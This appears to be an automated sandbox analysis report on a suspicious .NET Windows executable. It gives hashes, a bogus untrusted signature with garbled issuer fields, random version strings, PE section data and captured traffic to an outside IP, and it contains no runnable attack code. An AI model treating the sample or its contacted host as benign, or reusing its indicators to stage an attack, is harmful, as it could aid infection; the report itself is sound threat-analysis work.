                                                    SHA512:69d91b22e3718afa7ce31eea7c474ea6e8862c114186c832cf0bb9c8e1cce19b17275d01dc025da9d98e58a08265e6bf22f8084a010c06b840c4ad123fc1375c
                                                    SSDEEP:384:Mhwp6WjOxO7CLlbMq/JYogNGqQsKNAdAfpniHRlhFk:gSSbhxJFqtPAfpniHbh6
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....F...............0..0...........N... ...`....@.. ...............................y....@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x404e8e
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Authenticode Signature

                                                    Signature Valid:false
                                                    Signature Issuer:C=????????????????????????????????????????, S=&#225;&#175;&#138;&#225;&#175;&#153;&#225;&#175;&#167;&#225;&#175;&#179;&#225;&#175;&#142;&#225;&#175;&#140;&#225;&#175;&#147;&#225;&#175;&#150;&#225;&#175;&#167;&#225;&#175;&#166;&#225;&#175;&#165;&#225;&#175;&#134;&#225;&#175;&#144;&#225;&#175;&#137;&#225;&#175;&#144;&#225;&#175;&#163;&#225;&#175;&#141;&#225;&#175;&#134;&#225;&#175;&#169;&#225;&#175;&#132;&#225;&#175;&#175;&#225;&#175;&#183;&#225;&#175;&#162;&#225;&#175;&#150;&#225;&#175;&#146;&#225;&#175;&#139;&#225;&#175;&#145;&#225;&#175;&#146;&#225;&#175;&#176;&#225;&#175;&#187;&#225;&#175;&#142;&#225;&#175;&#138;&#225;&#175;&#187;&#225;&#175;&#132;&#225;&#175;&#131;&#225;&#175;&#179;&#225;&#175;&#131;&#225;&#175;&#173;&#225;&#175;&#150;&#225;&#175;&#166;&#225;&#175;&#183;&#225;&#175;&#151;&#225;&#175;&#183;&#225;&#175;&#139;&#225;&#175;&#137;&#225;&#175;&#138;&#225;&#175;&#140;, L=&#233;&#158;&#134;&#233;&#158;&#147;&#233;&#158;&#146;&#233;&#158;&#177;&#233;&#158;&#189;&#233;&#158;&#184;&#233;&#158;&#154;&#233;&#158;&#148;&#233;&#158;&#155;&#233;&#158;&#172;&#233;&#158;&#145;&#233;&#158;&#166;, T=&#237;&#133;&#174;&#237;&#133;&#132;&#237;&#133;&#140;&#237;&#133;&#133;&#237;&#133;&#129;&#237;&#133;&#137;&#237;&#133;&#176;&#237;&#133;&#143;&#237;&#133;&#142;&#237;&#132;&#191;&#237;&#133;&#148;&#237;&#132;&#189;&#237;&#133;&#147;&#237;&#133;&#181;&#237;&#133;&#161;&#237;&#133;&#146;&#237;&#133;&#142;&#237;&#133;&#161;&#237;&#133;&#133;&#237;&#133;&#171;&#237;&#133;&#168;&#237;&#133;&#146;&#237;&#133;&#140;&#237;&#133;&#160;&#237;&#133;&#146;&#237;&#133;&#139;&#237;&#133;&#132;&#237;&#133;&#158;&#237;&#133;&#163;&#237;&#133;&#164;&#237;&#133;&#136;&#237;&#133;&#159;&#237;&#133;&#178;&#237;&#133;&#143;&#237;&#133;&#177;&#237;&#133;&#182;&#237;&#133;&#163;&#237;&#133;&#166;&#237;&#133;&#172;&#237;&#133;&#131;&#237;&#132;&#191;&#237;&#133;&#131;&#237;&#133;&#139;&#237;&#133;&#169;, E=???????????, OU=&#231;&#177;&#152;&#231;&#177;&#184;&#231;&#177;&#180;&#231;&#177;&#189;&#231;&#177;&#157;&#231;&#177;&#149;&#231;&#177;&#151;&#231;&#177;&#164;&#231;&#177;&#169;&#231;&#178;&#139;&#231;&#177;&#164;&#231;&#178;&#132;&#231;&#178;&#140;&#231;&#178;&#132;&#231;&#177;&#156;&#231;&#178;&#140;&#231;&#177;&#152;&#231;&#177;&#189;&#231;&#177;&#181;&#231;&#178;&#130;&#231;&#177;&#162;&#231;&#177;&#160;&#231;&#177;&#180;&#231;&#178;&#134;&#231;&#177;&#168;, O=&#235;&#158;&#169;&#235;&#158;&#189;&#235;&#158;&#185;&#235;&#158;&#166;&#235;&#158;&#175;&#235;&#158;&#185;&#235;&#158;&#133;&#235;&#158;&#176;&#235;&#158;&#137;&#235;&#158;&#143;&#235;&#158;&#183;&#235;&#158;&#174;&#235;&#158;&#177;&#235;&#158;&#187;&#235;&#158;&#171;&#235;&#158;&#133;&#235;&#158;&#184;, CN=&#236;&#176;&#159;&#236;&#176;&#168;&#236;&#176;&#179;&#236;&#176;&#180;&#236;&#176;&#145;&#236;&#176;&#183;&#236;&#176;&#182;&#236;&#176;&#180;&#236;&#176;&#159;&#236;&#176;&#142;&#236;&#176;&#153;&#236;&#176;&#151;&#236;&#176;&#169;&#236;&#176;&#178;&#236;&#176;&#175;&#236;&#176;&#153;&#236;&#176;&#147;&#236;&#176;&#145;&#236;&#176;&#172;
                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                    Error Number:-2146762487
                                                    Not Before, Not After
                                                    • 2/22/2021 10:04:11 PM 2/22/2022 10:04:11 PM
                                                    Subject Chain
                                                    • C=????????????????????????????????????????, S=&#225;&#175;&#138;&#225;&#175;&#153;&#225;&#175;&#167;&#225;&#175;&#179;&#225;&#175;&#142;&#225;&#175;&#140;&#225;&#175;&#147;&#225;&#175;&#150;&#225;&#175;&#167;&#225;&#175;&#166;&#225;&#175;&#165;&#225;&#175;&#134;&#225;&#175;&#144;&#225;&#175;&#137;&#225;&#175;&#144;&#225;&#175;&#163;&#225;&#175;&#141;&#225;&#175;&#134;&#225;&#175;&#169;&#225;&#175;&#132;&#225;&#175;&#175;&#225;&#175;&#183;&#225;&#175;&#162;&#225;&#175;&#150;&#225;&#175;&#146;&#225;&#175;&#139;&#225;&#175;&#145;&#225;&#175;&#146;&#225;&#175;&#176;&#225;&#175;&#187;&#225;&#175;&#142;&#225;&#175;&#138;&#225;&#175;&#187;&#225;&#175;&#132;&#225;&#175;&#131;&#225;&#175;&#179;&#225;&#175;&#131;&#225;&#175;&#173;&#225;&#175;&#150;&#225;&#175;&#166;&#225;&#175;&#183;&#225;&#175;&#151;&#225;&#175;&#183;&#225;&#175;&#139;&#225;&#175;&#137;&#225;&#175;&#138;&#225;&#175;&#140;, L=&#233;&#158;&#134;&#233;&#158;&#147;&#233;&#158;&#146;&#233;&#158;&#177;&#233;&#158;&#189;&#233;&#158;&#184;&#233;&#158;&#154;&#233;&#158;&#148;&#233;&#158;&#155;&#233;&#158;&#172;&#233;&#158;&#145;&#233;&#158;&#166;, T=&#237;&#133;&#174;&#237;&#133;&#132;&#237;&#133;&#140;&#237;&#133;&#133;&#237;&#133;&#129;&#237;&#133;&#137;&#237;&#133;&#176;&#237;&#133;&#143;&#237;&#133;&#142;&#237;&#132;&#191;&#237;&#133;&#148;&#237;&#132;&#189;&#237;&#133;&#147;&#237;&#133;&#181;&#237;&#133;&#161;&#237;&#133;&#146;&#237;&#133;&#142;&#237;&#133;&#161;&#237;&#133;&#133;&#237;&#133;&#171;&#237;&#133;&#168;&#237;&#133;&#146;&#237;&#133;&#140;&#237;&#133;&#160;&#237;&#133;&#146;&#237;&#133;&#139;&#237;&#133;&#132;&#237;&#133;&#158;&#237;&#133;&#163;&#237;&#133;&#164;&#237;&#133;&#136;&#237;&#133;&#159;&#237;&#133;&#178;&#237;&#133;&#143;&#237;&#133;&#177;&#237;&#133;&#182;&#237;&#133;&#163;&#237;&#133;&#166;&#237;&#133;&#172;&#237;&#133;&#131;&#237;&#132;&#191;&#237;&#133;&#131;&#237;&#133;&#139;&#237;&#133;&#169;, E=???????????, OU=&#231;&#177;&#152;&#231;&#177;&#184;&#231;&#177;&#180;&#231;&#177;&#189;&#231;&#177;&#157;&#231;&#177;&#149;&#231;&#177;&#151;&#231;&#177;&#164;&#231;&#177;&#169;&#231;&#178;&#139;&#231;&#177;&#164;&#231;&#178;&#132;&#231;&#178;&#140;&#231;&#178;&#132;&#231;&#177;&#156;&#231;&#178;&#140;&#231;&#177;&#152;&#231;&#177;&#189;&#231;&#177;&#181;&#231;&#178;&#130;&#231;&#177;&#162;&#231;&#177;&#160;&#231;&#177;&#180;&#231;&#178;&#134;&#231;&#177;&#168;, O=&#235;&#158;&#169;&#235;&#158;&#189;&#235;&#158;&#185;&#235;&#158;&#166;&#235;&#158;&#175;&#235;&#158;&#185;&#235;&#158;&#133;&#235;&#158;&#176;&#235;&#158;&#137;&#235;&#158;&#143;&#235;&#158;&#183;&#235;&#158;&#174;&#235;&#158;&#177;&#235;&#158;&#187;&#235;&#158;&#171;&#235;&#158;&#133;&#235;&#158;&#184;, CN=&#236;&#176;&#159;&#236;&#176;&#168;&#236;&#176;&#179;&#236;&#176;&#180;&#236;&#176;&#145;&#236;&#176;&#183;&#236;&#176;&#182;&#236;&#176;&#180;&#236;&#176;&#159;&#236;&#176;&#142;&#236;&#176;&#153;&#236;&#176;&#151;&#236;&#176;&#169;&#236;&#176;&#178;&#236;&#176;&#175;&#236;&#176;&#153;&#236;&#176;&#147;&#236;&#176;&#145;&#236;&#176;&#172;
                                                    Version:3
                                                    Thumbprint MD5:9F981C1542F258BA57F760B8F42201BA
                                                    Thumbprint SHA-1:9B44DB25DEE3DB49C3571B6A649C69CF2B48307D
                                                    Thumbprint SHA-256:7F1CD5F2C754597D3ED7F82B0146688256270022763BF32FA684505C11EF7A2A
                                                    Serial:00C1276E79B4388663776A454F741801A5

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x4e3c0x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x3e0.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x38000x1888
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x2e940x3000False0.579345703125PPMN archive data6.39301885442IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x60000x3e00x400False0.4638671875data3.55157726961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x80000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_VERSION0x60580x388dataEnglishUnited States

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    LegalCopyrightCopyright 2022 MMluWNXR. All rights reserved.
                                                    Assembly Version8.3.0.1
                                                    InternalNameIGtzbNIQ.exe
                                                    FileVersion8.3.2.1
                                                    CompanyNameJKJPfHWc
                                                    LegalTrademarksXFJPuaSO
                                                    CommentsPAljSTEY
                                                    ProductNameIGtzbNIQ
                                                    ProductVersion8.3.0.1
                                                    FileDescriptionJDbwXxui
                                                    OriginalFilenameIGtzbNIQ.exe
                                                    Translation0x0409 0x0514

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Feb 23, 2021 09:46:49.547159910 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.600218058 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.600352049 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.601401091 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.654299974 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.687654018 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.687699080 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.687726974 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.687747002 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.687817097 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.688225985 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.688261032 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.688283920 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.688308954 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.688333988 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.688355923 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.688360929 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.688412905 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.689474106 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.689511061 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.689579010 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.690706968 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.690741062 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.690807104 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.691931963 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.691966057 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.692207098 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.693195105 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.693232059 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.693456888 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.694432974 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.694464922 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.694533110 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.695667028 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.695698977 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.696310043 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.696885109 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.696917057 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.696983099 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.698121071 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.698153973 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.698218107 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.699824095 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.699856043 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.699943066 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.700620890 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.700655937 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.700696945 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.740746975 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.740792036 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.740860939 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.741241932 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.741271973 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.741323948 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.742525101 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.742561102 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.742611885 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.743724108 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.743783951 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.743841887 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.744987011 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.745585918 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.745621920 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.745641947 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.746828079 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.746870995 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.746906996 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.748076916 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.748135090 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.748147964 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.749310970 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.749347925 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.749372005 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.750562906 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.750601053 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.750631094 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.751826048 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.751856089 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.751888990 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.753025055 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.753053904 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.753082991 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.754278898 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.754313946 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.754328012 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.755542994 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.755600929 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.755606890 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.756756067 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.756793022 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.756820917 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.758002996 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.758039951 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.758071899 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.759249926 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.759315968 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.759833097 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.759865046 CET8049734104.21.71.230192.168.2.4
                                                    Feb 23, 2021 09:46:49.759911060 CET4973480192.168.2.4104.21.71.230
                                                    Feb 23, 2021 09:46:49.761127949 CET8049734104.21.71.230192.168.2.4

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Feb 23, 2021 09:46:42.001240969 CET5453153192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:42.052741051 CET53545318.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:42.979888916 CET4971453192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:43.045166016 CET53497148.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:43.292514086 CET5802853192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:43.350888014 CET53580288.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:43.969582081 CET5309753192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:44.021044970 CET53530978.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:45.230526924 CET4925753192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:45.279738903 CET53492578.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:46.422629118 CET6238953192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:46.474086046 CET53623898.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:47.701091051 CET4991053192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:47.749731064 CET53499108.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:48.638009071 CET5585453192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:48.690993071 CET53558548.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:49.462008953 CET6454953192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:49.524245024 CET53645498.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:49.879054070 CET6315353192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:49.927489996 CET53631538.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:51.107851028 CET5299153192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:51.158024073 CET53529918.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:52.032669067 CET5370053192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:52.084407091 CET53537008.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:53.216989040 CET5172653192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:53.268445969 CET53517268.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:54.436453104 CET5679453192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:54.485238075 CET53567948.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:55.478406906 CET5653453192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:55.528536081 CET53565348.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:56.664275885 CET5662753192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:56.716010094 CET53566278.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:57.948623896 CET5662153192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:57.998764992 CET53566218.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:46:59.326009989 CET6311653192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:46:59.374589920 CET53631168.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:00.498929977 CET6407853192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:00.550529957 CET53640788.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:01.702426910 CET6480153192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:01.753803015 CET53648018.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:03.529426098 CET6172153192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:03.578073978 CET53617218.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:10.883807898 CET5125553192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:10.935354948 CET53512558.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:11.641897917 CET6152253192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:11.693872929 CET53615228.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:32.954160929 CET5233753192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:33.021403074 CET53523378.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:33.692751884 CET5504653192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:33.755928040 CET53550468.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:34.363035917 CET4961253192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:34.422765970 CET53496128.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:34.481651068 CET4928553192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:34.543003082 CET53492858.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:34.698141098 CET5060153192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:34.763484001 CET53506018.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:34.870208979 CET6087553192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:34.931930065 CET53608758.8.8.8192.168.2.4
